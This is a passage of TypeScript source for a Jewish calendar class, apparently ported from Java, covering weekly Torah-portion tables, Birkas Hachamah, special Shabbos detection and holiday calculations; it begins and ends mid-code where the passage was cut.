[Parsha.NONE, Parsha.NONE, Parsha.HAAZINU, Parsha.NONE, Parsha.NONE, Parsha.BERESHIS, Parsha.NOACH, Parsha.LECH_LECHA, Parsha.VAYERA, Parsha.CHAYEI_SARA, Parsha.TOLDOS, Parsha.VAYETZEI, Parsha.VAYISHLACH, Parsha.VAYESHEV, Parsha.MIKETZ, Parsha.VAYIGASH, Parsha.VAYECHI, Parsha.SHEMOS, Parsha.VAERA, Parsha.BO, Parsha.BESHALACH, Parsha.YISRO, Parsha.MISHPATIM, Parsha.TERUMAH, Parsha.TETZAVEH, Parsha.KI_SISA, Parsha.VAYAKHEL_PEKUDEI, Parsha.VAYIKRA, Parsha.TZAV, Parsha.NONE, Parsha.SHMINI, Parsha.TAZRIA_METZORA, Parsha.ACHREI_MOS_KEDOSHIM, Parsha.EMOR, Parsha.BEHAR_BECHUKOSAI, Parsha.BAMIDBAR, Parsha.NASSO, Parsha.BEHAALOSCHA, Parsha.SHLACH, Parsha.KORACH, Parsha.CHUKAS, Parsha.BALAK, Parsha.PINCHAS, Parsha.MATOS_MASEI, Parsha.DEVARIM, Parsha.VAESCHANAN, Parsha.EIKEV, Parsha.REEH, Parsha.SHOFTIM, Parsha.KI_SEITZEI, Parsha.KI_SAVO, Parsha.NITZAVIM],
[Parsha.NONE, Parsha.NONE, Parsha.HAAZINU, Parsha.NONE, Parsha.NONE, Parsha.BERESHIS, Parsha.NOACH, Parsha.LECH_LECHA, Parsha.VAYERA, Parsha.CHAYEI_SARA, Parsha.TOLDOS, Parsha.VAYETZEI, Parsha.VAYISHLACH, Parsha.VAYESHEV, Parsha.MIKETZ, Parsha.VAYIGASH, Parsha.VAYECHI, Parsha.SHEMOS, Parsha.VAERA, Parsha.BO, Parsha.BESHALACH, Parsha.YISRO, Parsha.MISHPATIM, Parsha.TERUMAH, Parsha.TETZAVEH, Parsha.KI_SISA, Parsha.VAYAKHEL_PEKUDEI, Parsha.VAYIKRA, Parsha.TZAV, Parsha.NONE, Parsha.SHMINI, Parsha.TAZRIA_METZORA, Parsha.ACHREI_MOS_KEDOSHIM, Parsha.EMOR, Parsha.BEHAR_BECHUKOSAI, Parsha.BAMIDBAR, Parsha.NASSO, Parsha.BEHAALOSCHA, Parsha.SHLACH, Parsha.KORACH, Parsha.CHUKAS, Parsha.BALAK, Parsha.PINCHAS, Parsha.MATOS_MASEI, Parsha.DEVARIM, Parsha.VAESCHANAN, Parsha.EIKEV, Parsha.REEH, Parsha.SHOFTIM, Parsha.KI_SEITZEI, Parsha.KI_SAVO, Parsha.NITZAVIM_VAYEILECH],
[Parsha.NONE, Parsha.VAYEILECH, Parsha.HAAZINU, Parsha.NONE, Parsha.BERESHIS, Parsha.NOACH, Parsha.LECH_LECHA, Parsha.VAYERA, Parsha.CHAYEI_SARA, Parsha.TOLDOS, Parsha.VAYETZEI, Parsha.VAYISHLACH, Parsha.VAYESHEV, Parsha.MIKETZ, Parsha.VAYIGASH, Parsha.VAYECHI, Parsha.SHEMOS, Parsha.VAERA, Parsha.BO, Parsha.BESHALACH, Parsha.YISRO, Parsha.MISHPATIM, Parsha.TERUMAH, Parsha.TETZAVEH, Parsha.KI_SISA, Parsha.VAYAKHEL, Parsha.PEKUDEI, Parsha.VAYIKRA, Parsha.TZAV, Parsha.SHMINI, Parsha.TAZRIA, Parsha.METZORA, Parsha.NONE, Parsha.ACHREI_MOS, Parsha.KEDOSHIM, Parsha.EMOR, Parsha.BEHAR, Parsha.BECHUKOSAI, Parsha.BAMIDBAR, Parsha.NONE, Parsha.NASSO, Parsha.BEHAALOSCHA, Parsha.SHLACH, Parsha.KORACH, Parsha.CHUKAS_BALAK, Parsha.PINCHAS, Parsha.MATOS_MASEI, Parsha.DEVARIM, Parsha.VAESCHANAN, Parsha.EIKEV, Parsha.REEH, Parsha.SHOFTIM, Parsha.KI_SEITZEI, Parsha.KI_SAVO, Parsha.NITZAVIM_VAYEILECH],
[Parsha.NONE, Parsha.VAYEILECH, Parsha.HAAZINU, Parsha.NONE, Parsha.BERESHIS, Parsha.NOACH, Parsha.LECH_LECHA, Parsha.VAYERA, Parsha.CHAYEI_SARA, Parsha.TOLDOS, Parsha.VAYETZEI, Parsha.VAYISHLACH, Parsha.VAYESHEV, Parsha.MIKETZ, Parsha.VAYIGASH, Parsha.VAYECHI, Parsha.SHEMOS, Parsha.VAERA, Parsha.BO, Parsha.BESHALACH, Parsha.YISRO, Parsha.MISHPATIM, Parsha.TERUMAH, Parsha.TETZAVEH, Parsha.KI_SISA, Parsha.VAYAKHEL, Parsha.PEKUDEI, Parsha.VAYIKRA, Parsha.TZAV, Parsha.SHMINI, Parsha.TAZRIA, Parsha.METZORA, Parsha.NONE, Parsha.NONE, Parsha.ACHREI_MOS, Parsha.KEDOSHIM, Parsha.EMOR, Parsha.BEHAR, Parsha.BECHUKOSAI, Parsha.BAMIDBAR, Parsha.NASSO, Parsha.BEHAALOSCHA, Parsha.SHLACH, Parsha.KORACH, Parsha.CHUKAS, Parsha.BALAK, Parsha.PINCHAS, Parsha.MATOS_MASEI, Parsha.DEVARIM, Parsha.VAESCHANAN, Parsha.EIKEV, Parsha.REEH, Parsha.SHOFTIM, Parsha.KI_SEITZEI, Parsha.KI_SAVO, Parsha.NITZAVIM],
[Parsha.NONE, Parsha.HAAZINU, Parsha.NONE, Parsha.NONE, Parsha.BERESHIS, Parsha.NOACH, Parsha.LECH_LECHA, Parsha.VAYERA, Parsha.CHAYEI_SARA, Parsha.TOLDOS, Parsha.VAYETZEI, Parsha.VAYISHLACH, Parsha.VAYESHEV, Parsha.MIKETZ, Parsha.VAYIGASH, Parsha.VAYECHI, Parsha.SHEMOS, Parsha.VAERA, Parsha.BO, Parsha.BESHALACH, Parsha.YISRO, Parsha.MISHPATIM, Parsha.TERUMAH, Parsha.TETZAVEH, Parsha.KI_SISA, Parsha.VAYAKHEL, Parsha.PEKUDEI, Parsha.VAYIKRA, Parsha.TZAV, Parsha.SHMINI, Parsha.TAZRIA, Parsha.METZORA, Parsha.ACHREI_MOS, Parsha.NONE, Parsha.KEDOSHIM, Parsha.EMOR, Parsha.BEHAR, Parsha.BECHUKOSAI, Parsha.BAMIDBAR, Parsha.NASSO, Parsha.BEHAALOSCHA, Parsha.SHLACH, Parsha.KORACH, Parsha.CHUKAS, Parsha.BALAK, Parsha.PINCHAS, Parsha.MATOS, Parsha.MASEI, Parsha.DEVARIM, Parsha.VAESCHANAN, Parsha.EIKEV, Parsha.REEH, Parsha.SHOFTIM, Parsha.KI_SEITZEI, Parsha.KI_SAVO, Parsha.NITZAVIM],
[Parsha.NONE, Parsha.HAAZINU, Parsha.NONE, Parsha.NONE, Parsha.BERESHIS, Parsha.NOACH, Parsha.LECH_LECHA, Parsha.VAYERA, Parsha.CHAYEI_SARA, Parsha.TOLDOS, Parsha.VAYETZEI, Parsha.VAYISHLACH, Parsha.VAYESHEV, Parsha.MIKETZ, Parsha.VAYIGASH, Parsha.VAYECHI, Parsha.SHEMOS, Parsha.VAERA, Parsha.BO, Parsha.BESHALACH, Parsha.YISRO, Parsha.MISHPATIM, Parsha.TERUMAH, Parsha.TETZAVEH, Parsha.KI_SISA, Parsha.VAYAKHEL, Parsha.PEKUDEI, Parsha.VAYIKRA, Parsha.TZAV, Parsha.SHMINI, Parsha.TAZRIA, Parsha.METZORA, Parsha.ACHREI_MOS, Parsha.NONE, Parsha.KEDOSHIM, Parsha.EMOR, Parsha.BEHAR, Parsha.BECHUKOSAI, Parsha.BAMIDBAR, Parsha.NASSO, Parsha.BEHAALOSCHA, Parsha.SHLACH, Parsha.KORACH, Parsha.CHUKAS, Parsha.BALAK, Parsha.PINCHAS, Parsha.MATOS, Parsha.MASEI, Parsha.DEVARIM, Parsha.VAESCHANAN, Parsha.EIKEV, Parsha.REEH, Parsha.SHOFTIM, Parsha.KI_SEITZEI, Parsha.KI_SAVO, Parsha.NITZAVIM_VAYEILECH],
[Parsha.NONE, Parsha.NONE, Parsha.HAAZINU, Parsha.NONE, Parsha.NONE, Parsha.BERESHIS, Parsha.NOACH, Parsha.LECH_LECHA, Parsha.VAYERA, Parsha.CHAYEI_SARA, Parsha.TOLDOS, Parsha.VAYETZEI, Parsha.VAYISHLACH, Parsha.VAYESHEV, Parsha.MIKETZ, Parsha.VAYIGASH, Parsha.VAYECHI, Parsha.SHEMOS, Parsha.VAERA, Parsha.BO, Parsha.BESHALACH, Parsha.YISRO, Parsha.MISHPATIM, Parsha.TERUMAH, Parsha.TETZAVEH, Parsha.KI_SISA, Parsha.VAYAKHEL, Parsha.PEKUDEI, Parsha.VAYIKRA, Parsha.TZAV, Parsha.SHMINI, Parsha.TAZRIA, Parsha.METZORA, Parsha.NONE, Parsha.ACHREI_MOS, Parsha.KEDOSHIM, Parsha.EMOR, Parsha.BEHAR, Parsha.BECHUKOSAI, Parsha.BAMIDBAR, Parsha.NASSO, Parsha.BEHAALOSCHA, Parsha.SHLACH, Parsha.KORACH, Parsha.CHUKAS, Parsha.BALAK, Parsha.PINCHAS, Parsha.MATOS_MASEI, Parsha.DEVARIM, Parsha.VAESCHANAN, Parsha.EIKEV, Parsha.REEH, Parsha.SHOFTIM, Parsha.KI_SEITZEI, Parsha.KI_SAVO, Parsha.NITZAVIM_VAYEILECH],
[Parsha.NONE, Parsha.NONE, Parsha.HAAZINU, Parsha.NONE, Parsha.NONE, Parsha.BERESHIS, Parsha.NOACH, Parsha.LECH_LECHA, Parsha.VAYERA, Parsha.CHAYEI_SARA, Parsha.TOLDOS, Parsha.VAYETZEI, Parsha.VAYISHLACH, Parsha.VAYESHEV, Parsha.MIKETZ, Parsha.VAYIGASH, Parsha.VAYECHI, Parsha.SHEMOS, Parsha.VAERA, Parsha.BO, Parsha.BESHALACH, Parsha.YISRO, Parsha.MISHPATIM, Parsha.TERUMAH, Parsha.TETZAVEH, Parsha.KI_SISA, Parsha.VAYAKHEL, Parsha.PEKUDEI, Parsha.VAYIKRA, Parsha.TZAV, Parsha.SHMINI, Parsha.TAZRIA, Parsha.METZORA, Parsha.NONE, Parsha.ACHREI_MOS, Parsha.KEDOSHIM, Parsha.EMOR, Parsha.BEHAR, Parsha.BECHUKOSAI, Parsha.BAMIDBAR, Parsha.NONE, Parsha.NASSO, Parsha.BEHAALOSCHA, Parsha.SHLACH, Parsha.KORACH, Parsha.CHUKAS_BALAK, Parsha.PINCHAS, Parsha.MATOS_MASEI, Parsha.DEVARIM, Parsha.VAESCHANAN, Parsha.EIKEV, Parsha.REEH, Parsha.SHOFTIM, Parsha.KI_SEITZEI, Parsha.KI_SAVO, Parsha.NITZAVIM_VAYEILECH],
[Parsha.NONE, Parsha.VAYEILECH, Parsha.HAAZINU, Parsha.NONE, Parsha.BERESHIS, Parsha.NOACH, Parsha.LECH_LECHA, Parsha.VAYERA, Parsha.CHAYEI_SARA, Parsha.TOLDOS, Parsha.VAYETZEI, Parsha.VAYISHLACH, Parsha.VAYESHEV, Parsha.MIKETZ, Parsha.VAYIGASH, Parsha.VAYECHI, Parsha.SHEMOS, Parsha.VAERA, Parsha.BO, Parsha.BESHALACH, Parsha.YISRO, Parsha.MISHPATIM, Parsha.TERUMAH, Parsha.TETZAVEH, Parsha.KI_SISA, Parsha.VAYAKHEL_PEKUDEI, Parsha.VAYIKRA, Parsha.TZAV, Parsha.NONE, Parsha.SHMINI, Parsha.TAZRIA_METZORA, Parsha.ACHREI_MOS_KEDOSHIM, Parsha.EMOR, Parsha.BEHAR_BECHUKOSAI, Parsha.BAMIDBAR, Parsha.NASSO, Parsha.BEHAALOSCHA, Parsha.SHLACH, Parsha.KORACH, Parsha.CHUKAS, Parsha.BALAK, Parsha.PINCHAS, Parsha.MATOS_MASEI, Parsha.DEVARIM, Parsha.VAESCHANAN, Parsha.EIKEV, Parsha.REEH, Parsha.SHOFTIM, Parsha.KI_SEITZEI, Parsha.KI_SAVO, Parsha.NITZAVIM_VAYEILECH],
[Parsha.NONE, Parsha.HAAZINU, Parsha.NONE, Parsha.NONE, Parsha.BERESHIS, Parsha.NOACH, Parsha.LECH_LECHA, Parsha.VAYERA, Parsha.CHAYEI_SARA, Parsha.TOLDOS, Parsha.VAYETZEI, Parsha.VAYISHLACH, Parsha.VAYESHEV, Parsha.MIKETZ, Parsha.VAYIGASH, Parsha.VAYECHI, Parsha.SHEMOS, Parsha.VAERA, Parsha.BO, Parsha.BESHALACH, Parsha.YISRO, Parsha.MISHPATIM, Parsha.TERUMAH, Parsha.TETZAVEH, Parsha.KI_SISA, Parsha.VAYAKHEL_PEKUDEI, Parsha.VAYIKRA, Parsha.TZAV, Parsha.NONE, Parsha.SHMINI, Parsha.TAZRIA_METZORA, Parsha.ACHREI_MOS_KEDOSHIM, Parsha.EMOR, Parsha.BEHAR, Parsha.BECHUKOSAI, Parsha.BAMIDBAR, Parsha.NASSO, Parsha.BEHAALOSCHA, Parsha.SHLACH, Parsha.KORACH, Parsha.CHUKAS, Parsha.BALAK, Parsha.PINCHAS, Parsha.MATOS_MASEI, Parsha.DEVARIM, Parsha.VAESCHANAN, Parsha.EIKEV, Parsha.REEH, Parsha.SHOFTIM, Parsha.KI_SEITZEI, Parsha.KI_SAVO, Parsha.NITZAVIM],
[Parsha.NONE, Parsha.VAYEILECH, Parsha.HAAZINU, Parsha.NONE, Parsha.BERESHIS, Parsha.NOACH, Parsha.LECH_LECHA, Parsha.VAYERA, Parsha.CHAYEI_SARA, Parsha.TOLDOS, Parsha.VAYETZEI, Parsha.VAYISHLACH, Parsha.VAYESHEV, Parsha.MIKETZ, Parsha.VAYIGASH, Parsha.VAYECHI, Parsha.SHEMOS, Parsha.VAERA, Parsha.BO, Parsha.BESHALACH, Parsha.YISRO, Parsha.MISHPATIM, Parsha.TERUMAH, Parsha.TETZAVEH, Parsha.KI_SISA, Parsha.VAYAKHEL, Parsha.PEKUDEI, Parsha.VAYIKRA, Parsha.TZAV, Parsha.SHMINI, Parsha.TAZRIA, Parsha.METZORA, Parsha.NONE, Parsha.ACHREI_MOS, Parsha.KEDOSHIM, Parsha.EMOR, Parsha.BEHAR, Parsha.BECHUKOSAI, Parsha.BAMIDBAR, Parsha.NASSO, Parsha.BEHAALOSCHA, Parsha.SHLACH, Parsha.KORACH, Parsha.CHUKAS, Parsha.BALAK, Parsha.PINCHAS, Parsha.MATOS_MASEI, Parsha.DEVARIM, Parsha.VAESCHANAN, Parsha.EIKEV, Parsha.REEH, Parsha.SHOFTIM, Parsha.KI_SEITZEI, Parsha.KI_SAVO, Parsha.NITZAVIM_VAYEILECH],
[Parsha.NONE, Parsha.VAYEILECH, Parsha.HAAZINU, Parsha.NONE, Parsha.BERESHIS, Parsha.NOACH, Parsha.LECH_LECHA, Parsha.VAYERA, Parsha.CHAYEI_SARA, Parsha.TOLDOS, Parsha.VAYETZEI, Parsha.VAYISHLACH, Parsha.VAYESHEV, Parsha.MIKETZ, Parsha.VAYIGASH, Parsha.VAYECHI, Parsha.SHEMOS, Parsha.VAERA, Parsha.BO, Parsha.BESHALACH, Parsha.YISRO, Parsha.MISHPATIM, Parsha.TERUMAH, Parsha.TETZAVEH, Parsha.KI_SISA, Parsha.VAYAKHEL, Parsha.PEKUDEI, Parsha.VAYIKRA, Parsha.TZAV, Parsha.SHMINI, Parsha.TAZRIA, Parsha.METZORA, Parsha.NONE, Parsha.ACHREI_MOS, Parsha.KEDOSHIM, Parsha.EMOR, Parsha.BEHAR, Parsha.BECHUKOSAI, Parsha.BAMIDBAR, Parsha.NASSO, Parsha.BEHAALOSCHA, Parsha.SHLACH, Parsha.KORACH, Parsha.CHUKAS, Parsha.BALAK, Parsha.PINCHAS, Parsha.MATOS, Parsha.MASEI, Parsha.DEVARIM, Parsha.VAESCHANAN, Parsha.EIKEV, Parsha.REEH, Parsha.SHOFTIM, Parsha.KI_SEITZEI, Parsha.KI_SAVO, Parsha.NITZAVIM],
[Parsha.NONE, Parsha.NONE, Parsha.HAAZINU, Parsha.NONE, Parsha.NONE, Parsha.BERESHIS, Parsha.NOACH, Parsha.LECH_LECHA, Parsha.VAYERA, Parsha.CHAYEI_SARA, Parsha.TOLDOS, Parsha.VAYETZEI, Parsha.VAYISHLACH, Parsha.VAYESHEV, Parsha.MIKETZ, Parsha.VAYIGASH, Parsha.VAYECHI, Parsha.SHEMOS, Parsha.VAERA, Parsha.BO, Parsha.BESHALACH, Parsha.YISRO, Parsha.MISHPATIM, Parsha.TERUMAH, Parsha.TETZAVEH, Parsha.KI_SISA, Parsha.VAYAKHEL, Parsha.PEKUDEI, Parsha.VAYIKRA, Parsha.TZAV, Parsha.SHMINI, Parsha.TAZRIA, Parsha.METZORA, Parsha.NONE, Parsha.ACHREI_MOS, Parsha.KEDOSHIM, Parsha.EMOR, Parsha.BEHAR, Parsha.BECHUKOSAI, Parsha.BAMIDBAR, Parsha.NASSO, Parsha.BEHAALOSCHA, Parsha.SHLACH, Parsha.KORACH, Parsha.CHUKAS, Parsha.BALAK, Parsha.PINCHAS, Parsha.MATOS_MASEI, Parsha.DEVARIM, Parsha.VAESCHANAN, Parsha.EIKEV, Parsha.REEH, Parsha.SHOFTIM, Parsha.KI_SEITZEI, Parsha.KI_SAVO, Parsha.NITZAVIM_VAYEILECH],
];
/**
* Returns whether this calendar is set to return modern Israeli national holidays. By default this value is false.
* The holidays are: "Yom HaShoah", "Yom Hazikaron", "Yom Ha'atzmaut" and "Yom Yerushalayim".
*
* @return true if set to return modern Israeli national holidays
*/
public isUseModernHolidays(): boolean {
return this.useModernHolidays;
}
/**
* Sets the calendar to return modern Israeli national holidays. By default this value is false. The holidays are:
* "Yom HaShoah", "Yom Hazikaron", "Yom Ha'atzmaut" and "Yom Yerushalayim".
*
* @param useModernHolidays
* the useModernHolidays to set
*/
public setUseModernHolidays(useModernHolidays: boolean): void {
this.useModernHolidays = useModernHolidays;
}
/**
* Default constructor will set a default date to the current system date.
*/
/*
public JewishCalendar() {
super();
}
*/
/**
* A constructor that initializes the date to the {@link java.util.Date Date} parameter.
*
* @param date
* the <code>Date</code> to set the calendar to
*/
/*
public JewishCalendar(date: Date) {
super(date);
}
*/
/**
* A constructor that initializes the date to the {@link java.util.Calendar Calendar} parameter.
*
* @param calendar
* the <code>Calendar</code> to set the calendar to
*/
/*
public JewishCalendar(calendar: GregorianCalendar) {
super(calendar);
}
*/
/**
* Creates a Jewish date based on a Jewish year, month and day of month.
*
* @param jewishYear
* the Jewish year
* @param jewishMonth
* the Jewish month. The method expects a 1 for Nissan ... 12 for Adar and 13 for Adar II. Use the
* constants {@link #NISSAN} ... {@link #ADAR} (or {@link #ADAR_II} for a leap year Adar II) to avoid any
* confusion.
* @param jewishDayOfMonth
* the Jewish day of month. If 30 is passed in for a month with only 29 days (for example {@link #IYAR},
* or {@link #KISLEV} in a year that {@link #isKislevShort()}), the 29th (last valid date of the month)
* will be set
* @throws IllegalArgumentException
* if the day of month is < 1 or > 30, or a year of < 0 is passed in.
*/
/*
public JewishCalendar(jewishYear: number, jewishMonth: number, jewishDayOfMonth: number) {
super(jewishYear, jewishMonth, jewishDayOfMonth);
}
*/
/**
* Creates a Jewish date based on a Jewish date and whether in Israel
*
* @param jewishYear
* the Jewish year
* @param jewishMonth
* the Jewish month. The method expects a 1 for Nissan ... 12 for Adar and 13 for Adar II. Use the
* constants {@link #NISSAN} ... {@link #ADAR} (or {@link #ADAR_II} for a leap year Adar II) to avoid any
* confusion.
* @param jewishDayOfMonth
* the Jewish day of month. If 30 is passed in for a month with only 29 days (for example {@link #IYAR},
* or {@link #KISLEV} in a year that {@link #isKislevShort()}), the 29th (last valid date of the month)
* will be set
* @param inIsrael
* whether in Israel. This affects Yom Tov calculations
*/
constructor(jewishYear: number, jewishMonth: number, jewishDayOfMonth: number, inIsrael?: boolean)
constructor(date: Date)
constructor(date: DateTime)
constructor()
constructor(jewishYearOrDateTimeOrDate?: number | Date | DateTime, jewishMonth?: number, jewishDayOfMonth?: number, inIsrael?: boolean) {
// @ts-ignore
super(jewishYearOrDateTimeOrDate, jewishMonth, jewishDayOfMonth);
if (inIsrael) this.setInIsrael(inIsrael);
}
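/*
 * A minimal usage sketch of the constructor overloads above; the concrete year, month and day
 * below are illustrative assumptions only, not values taken from this library's tests.
 *
 *   const chutzLaaretz = new JewishCalendar(5783, JewishCalendar.NISSAN, 15); // outside-Israel scheme (default)
 *   const israel = new JewishCalendar(5783, JewishCalendar.NISSAN, 15, true); // Israel scheme
 *   const fromDate = new JewishCalendar(new Date());                          // from a native Date
 *   const fromLuxon = new JewishCalendar(DateTime.local());                   // from a Luxon DateTime
 */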
/**
* Sets whether to use Israel holiday scheme or not. Default is false.
*
* @param inIsrael
* set to true for calculations for Israel
*/
public setInIsrael(inIsrael: boolean): void {
this.inIsrael = inIsrael;
}
/**
* Gets whether Israel holiday scheme is used or not. The default (if not set) is false.
*
* @return true if the calendar is set to Israel
*/
public getInIsrael(): boolean {
return this.inIsrael;
}
/**
* <a href="https://en.wikipedia.org/wiki/Birkat_Hachama">Birkas Hachamah</a> is recited every 28 years based on
* Tekufas Shmuel (Julian years), in which a year is 365.25 days. The <a href="https://en.wikipedia.org/wiki/Maimonides">Rambam</a>
* in <a href="http://hebrewbooks.org/pdfpager.aspx?req=14278&st=&pgnum=323">Hilchos Kiddush Hachodesh 9:3</a> states that
* tekufas Nisan of year 1 was 7 days + 9 hours before molad Nisan. This is calculated as every 10,227 days (28 * 365.25).
* @return true for a day that Birkas Hachamah is recited.
*/
public isBirkasHachamah(): boolean {
// elapsed days since molad ToHu
let elapsedDays: number = JewishCalendar.getJewishCalendarElapsedDays(this.getJewishYear());
// elapsed days to the current calendar date
elapsedDays += this.getDaysSinceStartOfJewishYear();
/* Molad Nisan year 1 was 177 days after molad tohu of Tishrei. We multiply 29.5 day months * 6 months from Tishrei
* to Nisan = 177. Subtract 7 days since tekufas Nisan was 7 days and 9 hours before the molad as stated in the Rambam
* and we are now at 170 days. Because getJewishCalendarElapsedDays and getDaysSinceStartOfJewishYear use the value for
* Rosh Hashana as 1, we have to add 1 day days for a total of 171. To this add a day since the tekufah is on a Tuesday
* night and we push off the bracha to Wednesday AM resulting in the 172 used in the calculation.
*/
// 28 years of 365.25 days + the offset from molad tohu mentioned above
return elapsedDays % (28 * 365.25) === 172;
}
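/*
 * A small illustration of the check above. Birkas Hachamah most recently fell on 14 Nissan 5769
 * (April 8, 2009), so, assuming that date, the 28-year cycle test should report true:
 *
 *   new JewishCalendar(5769, JewishCalendar.NISSAN, 14).isBirkasHachamah(); // expected: true
 *   new JewishCalendar(5769, JewishCalendar.NISSAN, 15).isBirkasHachamah(); // expected: false
 */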
/**
* Return the type of year for parsha calculations. The algorithm follows the
* <a href="http://hebrewbooks.org/pdfpager.aspx?req=14268&st=&pgnum=222"><NAME></a> in the Tur Ohr Hachaim.
* @return the type of year for parsha calculations.
* @todo Use constants in this class.
*/
private getParshaYearType(): number {
// plus one to the original Rosh Hashana of year 1 to get a week starting on Sunday
let roshHashanaDayOfWeek: number = (JewishCalendar.getJewishCalendarElapsedDays(this.getJewishYear()) + 1) % 7;
if (roshHashanaDayOfWeek === 0) {
// convert 0 to 7 for Shabbos for readability
roshHashanaDayOfWeek = SATURDAY;
}
if (this.isJewishLeapYear()) {
// eslint-disable-next-line default-case
switch (roshHashanaDayOfWeek) {
case MONDAY:
// BaCh
if (this.isKislevShort()) {
if (this.getInIsrael()) {
return 14;
}
return 6;
}
// BaSh
if (this.isCheshvanLong()) {
if (this.getInIsrael()) {
return 15;
}
return 7;
}
break;
// GaK
case TUESDAY:
if (this.getInIsrael()) {
return 15;
}
return 7;
case THURSDAY:
// HaCh
if (this.isKislevShort()) {
return 8;
}
// HaSh
if (this.isCheshvanLong()) {
return 9;
}
break;
case SATURDAY:
// ZaCh
if (this.isKislevShort()) {
return 10;
}
// ZaSh
if (this.isCheshvanLong()) {
if (this.getInIsrael()) {
return 16;
}
return 11;
}
break;
}
} else {
// not a leap year
// eslint-disable-next-line default-case
switch (roshHashanaDayOfWeek) {
case MONDAY:
// BaCh
if (this.isKislevShort()) {
return 0;
}
// BaSh
if (this.isCheshvanLong()) {
if (this.getInIsrael()) {
return 12;
}
return 1;
}
break;
case TUESDAY:
// GaK
if (this.getInIsrael()) {
return 12;
}
return 1;
case THURSDAY:
// HaSh
if (this.isCheshvanLong()) {
return 3;
}
// HaK
if (!this.isKislevShort()) {
if (this.getInIsrael()) {
return 13;
}
return 2;
}
break;
case SATURDAY:
// ZaCh
if (this.isKislevShort()) {
return 4;
}
// ZaSh
if (this.isCheshvanLong()) {
return 5;
}
break;
}
}
// keep the compiler happy
return -1;
}
/**
* Returns this week's {@link Parsha} if the calendar is set to a Shabbos.
* Returns Parsha.NONE on a weekday, or if there is no parsha that week (for example, when Yom Tov falls on Shabbos).
* @return the current parsha
*/
public getParsha(): Parsha {
if (this.getDayOfWeek() !== SATURDAY) {
return Parsha.NONE;
}
const yearType: number = this.getParshaYearType();
const roshHashanaDayOfWeek: number = JewishCalendar.getJewishCalendarElapsedDays(this.getJewishYear()) % 7;
const day: number = roshHashanaDayOfWeek + this.getDaysSinceStartOfJewishYear();
// negative year should be impossible, but let's cover all bases
if (yearType >= 0) {
return JewishCalendar.parshalist[yearType][day / 7];
}
// keep the compiler happy
return Parsha.NONE;
}
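/*
 * A minimal usage sketch of the lookup above: getParshaYearType() selects a row of parshalist and
 * (day / 7) selects the week within that row. The calendar value below is only an illustration.
 *
 *   const cal = new JewishCalendar(new Date());
 *   if (cal.getDayOfWeek() === SATURDAY) {
 *     const parsha = cal.getParsha(); // a Parsha value, or Parsha.NONE when Yom Tov falls on Shabbos
 *   }
 */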
/**
* Returns a parsha enum if the Shabbos is one of the four parshiyos of Parsha.SHKALIM, Parsha.ZACHOR, Parsha.PARA,
* Parsha.HACHODESH or Parsha.NONE for a regular Shabbos (or any weekday).
* @return one of the four parshiyos of Parsha.SHKALIM, Parsha.ZACHOR, Parsha.PARA, Parsha.HACHODESH or Parsha.NONE.
*/
public getSpecialShabbos(): Parsha {
if (this.getDayOfWeek() === SATURDAY) {
if (((this.getJewishMonth() === JewishCalendar.SHEVAT && !this.isJewishLeapYear()) ||
(this.getJewishMonth() === JewishCalendar.ADAR && this.isJewishLeapYear())) &&
[25, 27, 29].includes(this.getJewishDayOfMonth())) {
return Parsha.SHKALIM;
}
if ((this.getJewishMonth() === JewishCalendar.ADAR && !this.isJewishLeapYear()) ||
this.getJewishMonth() === JewishCalendar.ADAR_II) {
if (this.getJewishDayOfMonth() === 1) {
return Parsha.SHKALIM;
}
if ([8, 9, 11, 13].includes(this.getJewishDayOfMonth())) {
return Parsha.ZACHOR;
}
if ([18, 20, 22, 23].includes(this.getJewishDayOfMonth())) {
return Parsha.PARA;
}
if ([25, 27, 29].includes(this.getJewishDayOfMonth())) {
return Parsha.HACHODESH;
}
}
if (this.getJewishMonth() === JewishCalendar.NISSAN && this.getJewishDayOfMonth() === 1) {
return Parsha.HACHODESH;
}
}
return Parsha.NONE;
}
/**
* Returns the index of the Jewish holiday or fast day for the current day, or -1 if there is no holiday for this
* day.
*
* @return the holiday index (one of the constants defined in this class), or -1 if the day is not a holiday.
*/
public getYomTovIndex(): number {
const day: number = this.getJewishDayOfMonth();
const dayOfWeek: number = this.getDayOfWeek();
// check by month (starts from Nissan)
// eslint-disable-next-line default-case
switch (this.getJewishMonth()) {
case JewishCalendar.NISSAN:
if (day === 14) {
return JewishCalendar.EREV_PESACH;
} else if (day === 15 || day === 21 || (!this.inIsrael && (day === 16 || day === 22))) {
return JewishCalendar.PESACH;
} else if ((day >= 17 && day <= 20) || (day === 16 && this.inIsrael)) {
return JewishCalendar.CHOL_HAMOED_PESACH;
}
if (this.isUseModernHolidays() &&
((day === 26 && dayOfWeek === 5) || (day === 28 && dayOfWeek === 2) ||
(day === 27 && dayOfWeek !== 1 && dayOfWeek !== 6))) {
return JewishCalendar.YOM_HASHOAH;
}
break;
case JewishCalendar.IYAR:
if (this.isUseModernHolidays() &&
((day === 4 && dayOfWeek === 3) || ((day === 3 || day === 2) && dayOfWeek === 4) ||
(day === 5 && dayOfWeek === 2))) {
return JewishCalendar.YOM_HAZIKARON;
}
// if 5 Iyar falls on Wednesday, Yom Haatzmaut is that day. If it falls on Friday or Shabbos it is moved back to
// Thursday. If it falls on Monday it is moved to Tuesday.
if (this.isUseModernHolidays() && ((day === 5 && dayOfWeek === 4) ||
((day === 4 || day === 3) && dayOfWeek === 5) || (day === 6 && dayOfWeek === 3))) {
return JewishCalendar.YOM_HAATZMAUT;
}
if (day === 14) {
return JewishCalendar.PESACH_SHENI;
}
if (this.isUseModernHolidays() && day === 28) {
return JewishCalendar.YOM_YERUSHALAYIM;
}
break;
case JewishCalendar.SIVAN:
if (day === 5) {
return JewishCalendar.EREV_SHAVUOS;
} else if (day === 6 || (day === 7 && !this.inIsrael)) {
return JewishCalendar.SHAVUOS;
}
break;
case JewishCalendar.TAMMUZ:
// push off the fast day if it falls on Shabbos
if ((day === 17 && dayOfWeek !== 7) || (day === 18 && dayOfWeek === 1)) {
return JewishCalendar.SEVENTEEN_OF_TAMMUZ;
}
break;
case JewishCalendar.AV:
// if Tisha B'av falls on Shabbos, push off until Sunday
if ((dayOfWeek === 1 && day === 10) || (dayOfWeek !== 7 && day === 9)) {
return JewishCalendar.TISHA_BEAV;
} else if (day === 15) {
return JewishCalendar.TU_BEAV;
}
break;
case JewishCalendar.ELUL:
if (day === 29) {
return JewishCalendar.EREV_ROSH_HASHANA;
}
break;
case JewishCalendar.TISHREI:
if (day === 1 || day === 2) {
return JewishCalendar.ROSH_HASHANA;
} else if ((day === 3 && dayOfWeek !== 7) || (day === 4 && dayOfWeek === 1)) {
